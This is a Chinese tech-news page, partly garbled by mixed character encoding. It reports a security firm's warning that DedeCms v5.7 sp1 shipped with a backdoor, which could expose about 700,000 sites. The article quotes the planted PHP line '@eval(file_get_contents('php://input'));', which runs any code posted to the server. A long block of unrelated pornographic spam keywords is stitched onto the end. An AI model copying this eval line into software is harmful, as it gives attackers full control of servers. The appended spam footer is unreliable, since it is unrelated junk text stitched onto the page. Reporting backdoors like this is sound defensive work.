返回頂部
關閉軟件導航
位置:首頁 > 資訊 > 織夢新聞>織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保

瑞星公司今日對外發(fā)布緊急警示:國內知名的PHP開源網(wǎng)站管理系統(tǒng)——織夢CMS(DedeCms)v5.7 sp1版本被發(fā)現(xiàn)植入后門,黑客可通過此后門直接獲得網(wǎng)站的控制權限,獲取存儲在服務器上的文件和數(shù)據(jù)庫。據(jù)CMS官方數(shù)據(jù)顯示,目前約有70萬網(wǎng)站使用該系統(tǒng)搭建,涉及企業(yè)、政府機關、媒體機構、行業(yè)及個人網(wǎng)站等。瑞星公司特此緊急提醒使用該系統(tǒng)的網(wǎng)站管理員,使用瑞星網(wǎng)站密碼安全檢測系統(tǒng)查找后門并及時進行封堵。

wangluo1.jpg  

  據(jù)專家介紹,織夢CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過利用這個后門,黑客只需要構造簡單的數(shù)據(jù)包提交到服務器,就能夠獲取到該網(wǎng)站的WebShell,通過對服務器進一步滲透攻擊,進而獲取服務器的最高權限。

  

  織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保

  

  ▲CMS中被植入的后門代碼

  

  在黑客攻陷網(wǎng)站后,便可以直接訪問服務器上的文件、數(shù)據(jù)庫等信息。目前我國有大量網(wǎng)站采用該系統(tǒng),此后門或將導致大量用戶的信息泄露,造成極為嚴重的影響。

如果您覺得 織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保 這篇文章對您有用,請分享給您的好友,謝謝
文章地址:http://m.meyanliao.com/article/dede/1066.html
解放雙手無盡可能,有問題添加天線貓微信
主站蜘蛛池模板: 男人av无码天堂| 国产网红无码精品视频| 亚洲中文字幕无码久久精品1| 亚洲高清无码专区视频| 国99精品无码一区二区三区| 中文字幕人成无码人妻| 少妇无码太爽了在线播放| 无码人妻少妇久久中文字幕蜜桃 | 无码国产精成人午夜视频一区二区| 无码精品A∨在线观看| 亚洲精品无码专区2| 无码中文字幕乱码一区| 亚洲精品无码不卡在线播放HE| 加勒比无码一区二区三区| 亚洲精品无码AV人在线播放| 无码A级毛片日韩精品| 中文字幕无码不卡一区二区三区| 亚洲成a人片在线观看无码| 国产精品午夜无码AV天美传媒| 无码人妻久久久一区二区三区| 惠民福利中文字幕人妻无码乱精品| 亚洲国产AV无码一区二区三区| 无码AV岛国片在线播放| 亚洲色偷拍另类无码专区| 亚洲人成人无码网www国产| 丰满亚洲大尺度无码无码专线| 精品爆乳一区二区三区无码av| 人妻无码αv中文字幕久久琪琪布| 2014AV天堂无码一区| 国产色综合久久无码有码 | 少妇仑乱A毛片无码| 久久国产精品无码HDAV| 无码国产精品一区二区免费式芒果| 亚洲中文字幕无码一久久区| 国产亚洲精品无码成人| 久久久久亚洲AV成人无码网站| 国产精品三级在线观看无码| 无码人妻少妇久久中文字幕蜜桃| 日韩精品无码中文字幕一区二区| 无码人妻AV免费一区二区三区| 久久久久无码精品国产不卡|